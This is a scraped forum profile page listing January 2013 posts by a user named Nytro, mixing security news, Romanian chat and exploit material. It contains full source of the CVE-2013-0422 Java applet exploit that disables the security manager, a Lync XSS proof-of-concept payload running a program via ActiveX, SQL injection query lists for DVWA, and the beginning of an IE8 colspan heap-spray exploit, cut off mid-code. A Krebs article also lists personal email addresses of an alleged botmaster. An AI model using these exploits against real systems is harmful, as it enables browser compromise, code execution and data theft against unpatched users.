Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18715

  • Joined

  • Last visited

  • Days Won

    701

 Content Type 

Everything posted by Nytro

  1. Nytro
    This write up documents an analysis of the current Java zero-day floating around that affects version 7 update 10. Hello All, We were notified today of ongoing attacks with the use of a new Java vulnerability affecting latest version 7 Update 10 of the software [1][2]. Due to the unpatched status of Issue 50 [3] and some inquiries received regarding whether the attack code found exploited this bug, we had a quick look at the exploit code found in the wild. Below, we are providing you with the results of our analysis. The 0-day attack code that was spotted in the wild today is yet another instance of Java security vulnerabilities that stem from insecure implementation of Reflection API [4]. The new attack is a combination of two vulnerabilities. The first flaw allows to load arbitrary (restricted) classes by the means of findClass method of com.sun.jmx.mbeanserver.MBeanInstantiator class. This can be accomplished by the means of this code: public static Class loadClass(String name) throws Throwable { JmxMBeanServerBuilder jmxbsb=new JmxMBeanServerBuilder(); JmxMBeanServer jmxbs=(JmxMBeanServer)jmxbsb.newMBeanServer("",null,null); MBeanInstantiator mbi=jmxbs.getMBeanInstantiator(); return mbi.findClass(name,(ClassLoader)null); } The problem stems from insecure call to Class.forName() method. The second issue abuses the new Reflection API to successfully obtain and call MethodHandle objects that point to methods and constructors of restricted classes. This second issue relies on invokeWithArguments method call of java.lang.invoke.MethodHandle class, which has been already a subject of a security problem (Issue 32 that we reported to Oracle on Aug 31, 2012). The company had released a fix for Issue 32 in Oct 2012. However, it turns out that the fix was not complete as one can still abuse invokeWithArguments method to setup calls to invokeExact method with a trusted system class as a target method caller. This time the call is however done to methods of new Reflection API (from java.lang.invoke.* package), of which many rely on security checks conducted against the caller of the target method. Oracle's fix for Issue 32 relies on a binding of the MethodHandle object to the caller of a target method / constructor if it denotes a potentially dangerous Reflection API call. This binding has a form of injecting extra stack frame from a caller's Class Loader namespace into the call stack prior to issuing a security sensitive method call. Calls to blacklisted Reflection APIs are detected with the use of isCallerSensitive method of MethodHandleNatives class. The blacklisting however focuses primarily on Core Reflection API (Class.forName(), Class.getMethods(), etc.) and does not take into account the possibility to use new Reflection API calls. As a result, the invokeWithArguments trampoline used in the context of a system (privileged) lookup object may still be abused for gaining access to restricted classes, their methods, etc. The above is important in the context of a security check that is implemented by the Lookup class. Its checkSecurityManager method compares the Class Loader (CL) namespace of the caller class of a target find [*] method (findStatic, findVirtual, etc.) with the CL namespace of a class for which a given find operation is conducted. Access to restricted packages is not checked only if Class Loader namespaces are equal (the case for public lookup object, but also for a trusted method caller such as invokeWithArguments invoked for not blacklisted method). The exploit vector used by the attack code is the same as the one we used for second instance of our Proof of Concept code for Issue 32 (reported to Oracle on 17-Sep-2012). This exploit vector relies on sun.org.mozilla.javascript.internal.GeneratedClassLoader class in order to define a fully privileged attacker's class in a system Class Loader namespace. From that point all security checks can be easily disabled. This is not the first time Oracle fails to "sync" security of Core and new Reflection APIs. Just to mention the Reflection API filter. This is also not the first time Oracle's own investigation / analysis of security issues turns out to be not sufficiently comprehensive. Just to mention Issue 50, which was discovered in the code addressed by the company not so long ago... Bugs are like mushrooms, in many cases they can be found in a close proximity to those already spotted. It looks Oracle either stopped the picking too early or they are still deep in the woods... Thank you. Best Regards Adam Gowdiak --------------------------------------------- Security Explorations http://www.security-explorations.com "We bring security research to the new level" --------------------------------------------- References: [1] Malware don't need Coffee: 0 day 1.7u10 spotted in the Wild - Disable Java Plugin NOW ! http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html [2] New year, new Java zeroday! http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/ [3] [SE-2012-01] Critical security issue affecting Java SE 5/6/7 http://seclists.org/fulldisclosure/2012/Sep/170 [4] SE-2012-01 Details http://www.security-explorations.com/en/SE-2012-01-details.html Via: Java Zero-Day Analysis ? Packet Storm
  2. Nytro
    [h=2]Microsoft Lync 2012 Code Execution Vulnerability[/h] Summary ======= Microsoft Lync 2010 fails to properly sanitize user-supplied input, which can lead to remote code execution. Microsoft was originally notified of this issue December 11, 2012. The details of this issue were made public January 11, 2013. CVE number: Not Assigned Impact: Low Vendor homepage: http://lync.microsoft.com/ Vendor notified: December 11, 2012 Vendor fixed: N/A Credit: Christopher Emerson of White Oak Security (http://www.whiteoaksecurity.com/) Affected Products ================ Confirmed in Microsoft Lync Server 2010, version 4.0.7577.0. Other versions may also be affected. Details ======= Microsoft Lync 2010, version 4.0.7577.4087, fails to sanitize the “User-Agent Header” for meet.domainame.com. By inserting JavaScript into the aforementioned parameters and stacking commands, an attacker can execute arbitrary commands in the context of the application. Impact ====== Malicious users could execute arbitrary applications on the client systems, compromising the confidentiality, integrity and availability of information on the client system. Solution ======== The vendor should implement thorough input validation in order to remove dangerous characters from user supplied data. Additionally, the vendor should implement thorough output encoding in order to display, and not execute, dangerous characters within the browser. Proof-of-Concept (PoC) =================== The following Request is included as a proof of concept. The proof of concept is designed to open notepad.exe when the Request is received by the server. GET /christopher.emerson/JW926520 HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)";var oShell = new ActiveXObject("Shell.Application");var commandtoRun = "C:\\Windows\\notepad.exe";oShell.ShellExecute(commandtoRun,"","","open","1");-" Host: meet.domainname.com Connection: Keep-Alive Cookie: LOCO=yes; icscontext=cnet; ProfileNameCookie=Christopher Below is an abbreviated copy of the Response: HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-MS-Server-Fqdn: domainname.com X-Powered-By: ASP.NET Date: Mon, 07 May 2012 20:26:55 GMT Connection: keep-alive Content-Length: 23901 <!--NOTE: If DOCTYPE element is present, it causes the iFrame to be displayed in a small--> <!--portion of the browser window instead of occupying the full browser window.--> <html xmlns="http://www.w3.org/1999/xhtml" class="reachJoinHtml"> <head> <meta http-equiv="X-UA-Compatible" content="IE=10; IE=9; IE=8; requiresActiveX=true" /> <title>Microsoft Lync</title> <script type="text/javascript"> var reachURL = "https:// domainname.com/Reach/Client/WebPages/ReachJoin.aspx?xml=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48Y29uZi1pbmZvIHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3J0Yy8yMDA5LzA1L3NpbXBsZWpvaW5jb25mZG9jIj48Y29uZi11Y21rLXNpcDpjaHJpc3RvcGhlci5lbWVyc29uQGRvbWFpbm5hbWUuY29tO2dydXU7b3BhcXVlPWFwcDpjb25mOmZvY3VzOmlkOkpXOTI2NTIwPC9jb25mLXVyaT48c2VydmVyLXRpbWU+OTEuODAwNDwvc2VydmVyLXRpbWU+PG9yaWdpbmFsLWluY29taW5nLXVybD5odHRwczovL21lZXQuZG9tYWlubmFtZS5jb20vY2hyaXN0b3BoZXIuZW1lcnNvbi9KVzkyNjUyMDwvb3JpZ2luYWwtaW5jb21pbmctdWNtdy08Y29uZi1rZXk+Slc5MjY1MjA8L2NvbmYta2V5PjwvY29uZi1pbmZiejQh"; var escapedXML = "'\x3c\x3fxml version\x3d\x221.0\x22 encoding\x3d\x22utf-8\x22\x3f\x3e\x3cconf-info xmlns\x3axsi\x3d\x22http\x3a\x2f\x2fwww.w3.org\x2f2001\x2fXMLSchema-instance\x22 xmlns\x3axsd\x3d\x22http\x3a\x2f\x2fwww.w3.org\x2f2001\x2fXMLSchema\x22 xmlns\x3d\x22http\x3a\x2f\x2fschemas.microsoft.com\x2frtc\x2f2009\x2f05\x2fsimplejoinconfdoc\x22\x3e\x3cconf-uri\x3esip\x3achristopher.emerson\x40 domainname.com \x3bgruu\x3bopaque\x3dapp\x3aconf\x3afocus\x3aid\x3aJW926520\x3c\x2fconf-uri\x3e\x3cserver-time\x3e91.8004\x3c\x2fserver-time\x3e\x3coriginal-incoming-url\x3ehttps\x3a\x2f\ x2fmeet.domainname.com \x2fchristopher.emerson\x2fJW926520\x3c\x2foriginal-incoming-url\x3e\x3cconf-key\x3eJW926520\x3c\x2fconf-key\x3e\x3c\x2fconf-info\x3e'"; var showJoinUsingLegacyClientLink = "False"; var validMeeting = "True"; var reachClientRequested = "False"; var currentLanguage = "en-US"; var reachClientProductName = "Lync Web App"; var crackUrlRequest = "True"; var isNokia = "False"; var isAndroid = "False"; var isWinPhone = "False"; var isIPhone = "False"; var isIPad = "False"; var isMobile = "False"; var isUnsupported = "False"; var domainOwnerJoinLauncherUrl = ""; var lyncLaunchLink = "conf:sip:christopher.emerson@ domainname.com ;gruu;opaque=app:conf:focus:id:JW926520%3Frequired-media=audio"; var errorCode = "-1"; var diagInfo = "Machine:MachineNameBrowserId:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)";var oShell = new ActiveXObject("Shell.Application");var commandtoRun = "C:\\Windows\\notepad.exe";oShell.ShellExecute(commandtoRun,"","","open","1");-"Join attempted at:5/7/2012 3:26:55 PM"; var resourceUrl = "/meet/JavaScriptResourceHandler.ashx?lcs_se_w14_onprem4.0.7577.197&language="; Vendor Statement ============== The vulnerability described in this report is a XSS vulnerability in the User-Agent which requires an attacker to be in a man-in-the middle situation in order to be able to modify the User-Agent. In a default configuration of Lync server, TLS encryption is used to protect against this type of attack. Customers concerned about this issue should check their environments to ensure that Lync is configured to use TLS to encrypt all traffic, a default configuration. Disclosure Timeline ============== December 11, 2012: Disclosed to vendor (Microsoft Security Response Center). December 18, 2012: Vendor’s initial response. December 20, 2012: Vendor deemed issue a Low severity and confirmed issue would be fixed in next product release. December 27, 2012: Received vendor approval to disclose along with Vendor Statement (see above). January 11, 2013: Disclosed vulnerability publicly ( http://whiteoaksecurity.com/blog/2013/1/11/microsoft-lync-server-2010-remote-code-executionxss-user-agent-header ). ===================================================================== # 3C8F2163853A5DE5 1337day.com [2013-01-13] 1A58B10CEE71628B # Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
  3. Nytro
    Era doar o ironie domnule fan Tinkode. Ca sa iti petreci 5 minute pentru a gasi un SQL Injection intr-un site trebuie sa alegi site-ul nu? Tu ai ales "Asociatia Asistentilor Medicali din Banat". Eu doar te-am intrebat: "DE CE?". Trebuie sa ai un motiv nu? Sau a fost doar un dork si acesti "nenorociti" au cazut in primele rezultate Google? Intrebarea mea e simpla: "Care este motivul pentru care ai ales acest site?".
  4. Nytro
    Uau, ce "tinte"... Cum le gasesti?
  5. Nytro
    Sau invata C/C++ si o sa poti programa si pentru frigider sau cuptorul cu microunde...
  6. Nytro
    Java e cross-platform, adica poti face o aplicatie care sa ruleze si pe Windows si pe Linux. Problema principala este ca pentru a putea rula e nevoie de JRE (Java Runtime). Ca sa poti face aplicatii in Java trebuie sa cunosti clasele pe care le ofera. O alta problema cu Java este ca incepe sa nu mai fie foarte apreciat deoarece au aparut foarte multe exploit-uri. Visual Basic e strict marca Microsoft, si cred ca te referi la VB.NET deoarece nu cred ca e cazul sa se ramana la VB6. Daca vrei sa programezi strict pentru Windows, atunci poti folosi VB.NET insa iti recomand mai degraba C#. .NET Framework este un framework extrem de puternic si care iti ofera multe avantaje pentru scrierea rapida a unei aplicatii, insa ca si JRE este o dependinta necesara pentru a putea rula aplicatiile ce il folosesc.
  7. Nytro
    Nu inteleg de ce se face atata scandal pe seama asta, trebuie sa fii cap de tanc sa dai click pe asta: Apoi sa dai Run: Ca apoi sa existe posibilitatea sa nu functioneze: Singurul browser care nu te avertizeaza ca vei executa cod Java e Opera (cel putin versiunea pe care o am eu) insa fereastra cu "Run", pe langa avertismentele oferite de celalalte browsere care cer permisiunea utilizatorului, apare intotdeauna.
  8. Nytro
    Police Arrest Alleged ZeuS Botmaster “bx1? A man arrested in Thailand this week on charges of stealing millions from online bank accounts fits the profile of a miscreant nicknamed “bx1,” a hacker fingered by Microsoft as a major operator of botnets powered by the ZeuS banking trojan. As reported by The Bangkok Post, 24-year-old Hamza Bendelladj, an Algerian national, was detained this weekend at Bangkok’s Suvarnnabhumi airport, as he was in transit from Malaysia to Egypt. This young man captured news media attention when he was brought out in front of Thai television cameras handcuffed but smiling broadly, despite being blamed by the FBI for hacking into customer accounts at 217 financial institutions worldwide. Thai investigators told reporters that Bendelladj had amassed “huge amounts” in illicit earnings, and that “with just one transaction he could earn 10 to 20 million dollars. He’s been travelling the world flying first class and living a life of luxury.” I didn’t fully appreciate why I found this case so interesting until I started searching the Internet and my own servers for his email address. Turns out that in 2011, I was contacted via instant message by a hacker who said he was operating botnets using the Zeus and SpyEye Trojans. This individual reached out to me repeatedly over the next year, for no apparent reason except to brag about his exploits. He contacted me via Microsoft’s MSN instant message platform, using the email address daniel.h.b@universityofsutton.com. That account used the alias “Daniel.” I later found out that Daniel also used the nickname bx1. According to several forums on which bx1 hung out until very recently, the man arrested in Thailand and bx1 were one and the same. A review of the email addresses and other contact information bx1 shared on these forums suggests that bx1 was the 19th and 20th John Doe named in Microsoft’s 2012 legal suit seeking to discover the identities of 39 alleged ZeuS botmasters. From the complaint Microsoft submitted to the U.S. District Court for the Eastern District of Virginia, and posted at Zeuslegalnotice.com: “Plaintiffs are informed and believe and thereupon allege that John Doe 19/20 goes by the aliases “Daniel,” “bx1,” “Daniel Hamza” and “Danielbx1” and may be contacted at messaging email and messaging addresses “565359703,” airlord1988@gmail.com, bx1@hotmail.com, i_amhere@hotmail.fr, daniel.h.b@universityof sutton.com, princedelune@hotmail.fr, bx1_@msn.com, danibx1@hotmail.fr, and danieldelcore@hotmail.com. Upon information and belief, John Doe 19/20 has purchased and used the Zeus/SpyEye code.” The Daniel I chatted with was proud of his work, and seemed to enjoy describing successful attacks. In one such conversation, dated January 2012, bx1 bragged about breaking into the systems of a hacker who used the nickname “Symlink” and was renowned in the underground for writing complex, custom Web injects for ZeuS and SpyEye users. Specifically, Symlink’s code was designed to automate money transfers out of victim banks to accounts that ZeuS and SpyEye botmasters controlled. Here’s an excerpt from that chat: (12:31:22 AM) Daniel: if you wanna write up a story (12:31:34 AM) Daniel: a very perfect (12:31:34 AM) Daniel: even Interpol will get to you (12:31:35 AM) Brian Krebs: ? (12:31:42 AM) Daniel: i hacked the guy who fucked most banks (12:31:48 AM) Daniel: symlink the guy who made ATS (12:31:49 AM) Daniel: [img=https://rstforums.com/secimg.php?url=http://krebsonsecurity.com/wp-includes/images/smilies/icon_smile.gif] (12:32:02 AM) Daniel: ATS = Auto Transfer System (12:32:15 AM) Daniel: and get his Backups + Pictures and all his details (12:32:37 AM) Daniel: Recent Job etc etc (12:33:06 AM) Brian Krebs: what’s his name? (12:33:17 AM) Daniel: full name ? (12:34:03 AM) Brian Krebs: yeah (12:34:10 AM) Daniel: hmmmm (12:34:50 AM) Daniel: besliu vasile (12:35:01 AM) Brian Krebs: what kind of name is that? (12:35:11 AM) Brian Krebs: romanian? (12:35:13 AM) Daniel: Moldovian name (12:35:53 AM) Daniel: he is ugly motherufcka. (12:36:18 AM) Daniel: after i hacked him he said that i destroyed his life ( (12:36:27 AM) Brian Krebs: aww (12:36:55 AM) Daniel: yea because i spoke to him (12:37:10 AM) Daniel: i said how much u pay for ur info to stay private (12:37:19 AM) Daniel: then he said he destroyed his [hard drive] (12:37:28 AM) Daniel: i said i dont care i got Backup (12:37:32 AM) Daniel: it tooks me months to download all (12:37:48 AM) Daniel: his Previous job..ats..proof video (12:37:55 AM) Daniel: his picture with Zeus botnet showing up money (12:38:12 AM) Daniel: his car Plate number (12:38:17 AM) Daniel: Girls Friends (12:38:23 AM) Daniel: his workshop. he is mechanic (12:40:49 AM) Brian Krebs: huh. how come it took you months to [download]? (12:41:43 AM) Daniel: i waiting for him (12:41:46 AM) Daniel: if he don’t [pay] then i share just his personel info (12:41:57 AM) Daniel: and videos that proof abt his jobs etc etc It’s not clear whether bx1 had anything to do with it, but according to a lengthy thread on Mazafaka, one of the Underweb’s most exclusive cybercrime forums, Symlink was arrested late last year in Moldova. In a post on Oct. 11, 2012, forum regulars said Symlink had been arrested the day before, and that he got caught because he flaunted his ill-gotten wealth with fancy cars (a fully loaded Land Cruiser 200, valued at more than $100,000) and ostentatious lifestyle choices that were apparently considered far beyond the means of a local auto mechanic. As they do anytime a forum member gets arrested, the forum administrators banned Symlink’s account to distance themselves from the former member. “Economic police came to symlink yesterday. All computers were seized, one was encrypted and two not, all jabbers at the moment of seizure were online. Ban him temporarily, but better permanently. He was received adultly [meaning, arrested seriously]. Idiot overplayed.” It’s safe to say that bx1 had his share of enemies, and its possible that Symlink and/or his buddies got the last laugh. According to information obtained by KrebsOnSecurity, attackers recently targeted bx1 in a successful hack to break into his computer, making off with many files, email messages, screenshots and images from his machine. Among them were scanned copies of two identity cards, both bearing the name and likeness of Hamza “Daniel” Bendelladj; one from a “University of Sutton,” and another that appears to be some kind of international ID card. It’s not clear whether these documents are legitimate or manufactured, but probably the latter: the domain attached to bx1?s MSN email address — universityofsutton.com — is registered with the following contact data: domain: universityofsutton.com owner: Daniel Delcore organization: VIRUS & Malware Scanner email: bx1_@msn.com address: 522 8th street city: Columbus state: IN postal-code: 47201 country: US phone: +1.7573011758 admin-c: CCOM-1611324 bx1_@msn.com tech-c: CCOM-1611324 bx1_@msn.com billing-c: CCOM-1611324 bx1_@msn.com Sursa: Police Arrest Alleged ZeuS Botmaster “bx1? — Krebs on Security
  9. Nytro
    Monitoring Strcpy With Bphook In The Immunity Debugger Description: This is the solution to an exercise I had given in the SPSE course. I wanted the students to write a BPHook in the Immunity Debugger to monitor the arguments of the strcpy function. Due to the sparse documentation of the Immunity Debugger, this came out to be quite a challenge for many students. Why is this useful? API monitoring is probably the most fundamental thing when you want to observe programs at runtime and understand what they are doing. This video provides you the details on how to to the Immunity Debugger to write such as hook. SPSE Course details and sample videos: SecurityTube Python Scripting Expert
  10. Nytro
    Nosql, No Security? Description: Serving as a scalable alternative to traditional relational databases (RDBs), NoSQL databases have exploded in popularity. NoSQL databases offer more efficient ways to work with large datasets, but serious security issues need to be addressed. NoSQL databases can suffer from a variety of injection attacks. Most NoSQL databases can’t authenticate and authorize clients, and can’t provide role-based access controls or encryption. Because these controls do not exist, developers and administrators are forced to implement their own controls to compensate for these shortcomings. These compensating controls could become a problem for organizations that have compliance considerations and could make maintaining NoSQL more complex than simply deploying an enterprise relational database that features built-in security. Because many NoSQL architectures lack encryption and authentication, an attacker could eavesdrop on the client-server communication and obtain private data. Additionally, NoSQL databases can suffer from a variety of injection attacks via Javascript and JSON. Traditional SQL injection countermeasures are not effective against these attacks, so developers must be aware of these threats and write code that attackers can’t penetrate. In this presentation we’ll talk about how RDB security features and threats apply to NoSQL databases. We’ll also explore the security controls that are present in NoSQL architectures, and cover administrative, compliance and regulatory concerns associated with operating NoSQL architectures in environments that contain sensitive data. ***** Speaker: Will Urbanski, Dell Secureworks Will Urbanski, vulnerability engineer, Dell SecureWorks, guides large enterprises in initiating and administering vulnerability management programs within their corporate environments. Will also conducts penetration and vulnerability validation tests. An information security professional with more than seven years of industry experience, Will has been published in numerous journals, including IEEE Security & Privacy, and has co-authored a patent for an IPv6 moving target defense. Previously, Will worked in research and in security operations roles at Virginia Polytechnic Institute and the University of Georgia. He holds a B.S. in Computer Science from the University of Georgia, and is certified as a PCI Approved Scanning Vendor, a GIAC Penetration Tester and a GIAC Web Application Penetration Tester. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: NoSQL, No Security? - Will Urbanski on Vimeo Sursa: Nosql, No Security?
  11. Nytro
    Dns - Spoof + Browser Exploitation Description: In this video I will show you how to use Ettercap and Browser Exploitation module for Exploitation a local machine without giving any kind of URL. I’m using Ettercap for DNS spoofing and Metasploit for Browser Exploitation. In your network lets see the victim is using Google, Yahoo, Gmail, or any website. What you have to use - Ettercap you need to replace the path and if he will access google or yahoo if victim running vulnerable browser so you will get the shell or if not then he is not able to browser that particular sites. Very easy to follow but it is good technique I think. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Dns - Spoof + Browser Exploitation
  12. Nytro
    Dvwa - Blind Sql Injection Description: In this video I will show you how to use SQL Injection queries for exploitation a database for usersname and hash. I’m using DVWA with low level security. Use Metasploitable – 2 for DVWA. SQL Injection queries : - 1' and 1=1# 1' and 1=1 order by 2 # 'or' 1=1— 1' and 1=0 union select null,table_name from information_schema.tables# 1' and 1=0 union select null,table_name from information_schema.columns where table_name='users' # 1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users' # 1' and 1=0 union select null,concat(first_name,0x0a,password) from users # 1 and 1=0 union select table_name, column_name from information_schema.columns where table_name=0x7573657273 Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Dvwa - Blind Sql Injection
  13. Nytro
    Devine popular: Java Applet JMX Remote Code Execution Malware Intelligence Lab from FireEye - Research & Analysis of Zero-Day & Advanced Targeted Threats:Happy New Year from New Java Zero-Day Java allows 'open hunting season' for hackers, experts find | ZDNet Mozilla touts 'Click to Play' in defense against Java vulnerability | ZDNet
  14. Nytro
    [h=1]Web Warriors ~ CBC Documentary[/h] http://www.youtube.com/watch?feature=player_detailpage&v=34cwMz3HZ8Q Enter the world of hackers and cyber sleuths. The internet is touted as one of the most important inventions in the history of modern man, and like the discovery of the atom, its ability to benefit mankind is matched only by its potential to unleash massive destruction. Web Warriors is a one-hour documentary that offers an unprecedented glimpse into the world's newest and most vulnerable frontier: cyberspace. We enter the world of hackers like Mafia Boy - a 15 year old high school student who rose to infamy in 2000 by causing millions of dollars in damage after single-handedly shutting down internet giants - including Yahoo, Amazon, eBay, Dell, eTrade, and CNN. We'll meet hackers like Donnie who goes on a journey into the Russian cyber underground as he searches for the creators of a computer virus with the hopes of collecting the $250,000 bounty being offered by Microsoft. Just as in nature, computer viruses have rapidly evolved and now have the ability to control millions of computers unbeknownst to their owners, thereby creating massive illegal computer networks known as "Botnets". These "Botnets" are being put to a variety of illicit uses including identity theft and cyber extortion, but they are also the latest and most potent weapon being deployed in military conflicts. Web Warriors dissects the massive cyber attack against Estonia in 2007 which virtually shut down the country and resulted in NATO deploying its cyber response team. Web Warriors offers rare interviews with cyber sleuths from the FBI, the Pentagon, NATO, and the Department of Homeland Security who explain how cyberspace has become the latest battle ground between nation states and how terrorist groups are already plotting their next move. Web Warriors offers a fast-paced never-seen before glimpse into the cyber trenches of a world wide battle. Some reports say the cost of cyber crime is now on par with the illegal drug trade. Web Warriors was produced by Edward Peill for Tell Tale Productions Inc.
  15. Nytro
  16. Nytro
    Detalii: New year, new Java zeroday! - AlienVault Labs Malware don't need Coffee: 0 day (CVE-2013-0422) 1.7u10 spotted in the Wild - Disable Java Plugin NOW ! http://pastebin.com/raw.php?i=cUG2ayjh Exploit Packs updated with New Java Zero-Day vulnerability - Hacking News /* Java 0day 1.7.0_10 decrypted source Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0 From Russia with love. */ import java.applet.Applet; import com.sun.jmx.mbeanserver.JmxMBeanServer; import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder; import com.sun.jmx.mbeanserver.MBeanInstantiator; import java.lang.invoke.MethodHandle; import java.lang.invoke.MethodHandles; import java.lang.invoke.MethodType; import java.lang.reflect.Method; public byte[] hex2Byte(String paramString) { byte[] arrayOfByte = new byte[paramString.length() / 2]; for (int i = 0; i < arrayOfByte.length; i++) { arrayOfByte[i] = (byte)Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16); } return arrayOfByte; } public static String ByteArrayWithSecOff = & #34;CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F07002001 00063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C6501 00124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F4578 63657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F 07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F757263 6546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F 457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A65637401000142 0100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E41637469 6F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F 50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C6567656445 7863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176 612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A 6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000 020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100 040009000C00030003000B000000120004000000080004000B0009000C000D000D000C0000001600 02000D0000000D000E00010000000E000F001000000011000000100002FF000C0001070012000107 0013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B0000000 02000B0000000A00020000001000040011000C0000000C00010000000C000F001000000001001600 0000020017"; public void init() { try { byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff); JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder(); JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null); MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator(); ClassLoader a = null; Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a); Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a); MethodHandles.Lookup localLookup = MethodHandles.publicLookup(); MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class }); MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1); MethodType localMethodType2 = MethodType.methodType(Void.TYPE); MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 }); Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]); MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class }); MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3); MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class); MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 }); Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null }); MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class }); MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 }); Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte }); localClass3.newInstance(); Runtime.getRuntime().exec("calc.exe"); } catch (Throwable ex) {} } }
  17. Nytro
    Detalii: https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156 https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156 Ronin - Rails PoC exploits for CVE-2013-0156 and CVE-2013-0155
  18. Nytro
    PS: Author: sickness
  19. Nytro
    [h=1]Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass[/h] <!-- ** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass ** Author: sickness@offsec.com ** Thanks to Ryujin and Dookie for their help. #################################################################### ** Affected Software: Internet Explorer 8 ** Vulnerability: Fixed Col Span ID ** CVE: CVE-2012-1876 ** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb ** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php ** Tested on Windows 7 (x86) - IE 8.0.7601.17514 #################################################################### ** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak ** To get it working on a different version of Windows you will require to make your own chances to the exploit ** Have fun --> <html> <body> <div id="evil"></div> <table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table> <script language='javascript'> function strtoint(str) { return str.charCodeAt(1)*0x10000 + str.charCodeAt(0); } var free = "EEEE"; while ( free.length < 500 ) free += free; var string1 = "AAAA"; while ( string1.length < 500 ) string1 += string1; var string2 = "BBBB"; while ( string2.length < 500 ) string2 += string2; var fr = new Array(); var al = new Array(); var bl = new Array(); var div_container = document.getElementById("evil"); div_container.style.cssText = "display:none"; for (var i=0; i < 500; i+=2) { fr[i] = free.substring(0, (0x100-6)/2); al[i] = string1.substring(0, (0x100-6)/2); bl[i] = string2.substring(0, (0x100-6)/2); var obj = document.createElement("button"); div_container.appendChild(obj); } for (var i=200; i<500; i+=2 ) { fr[i] = null; 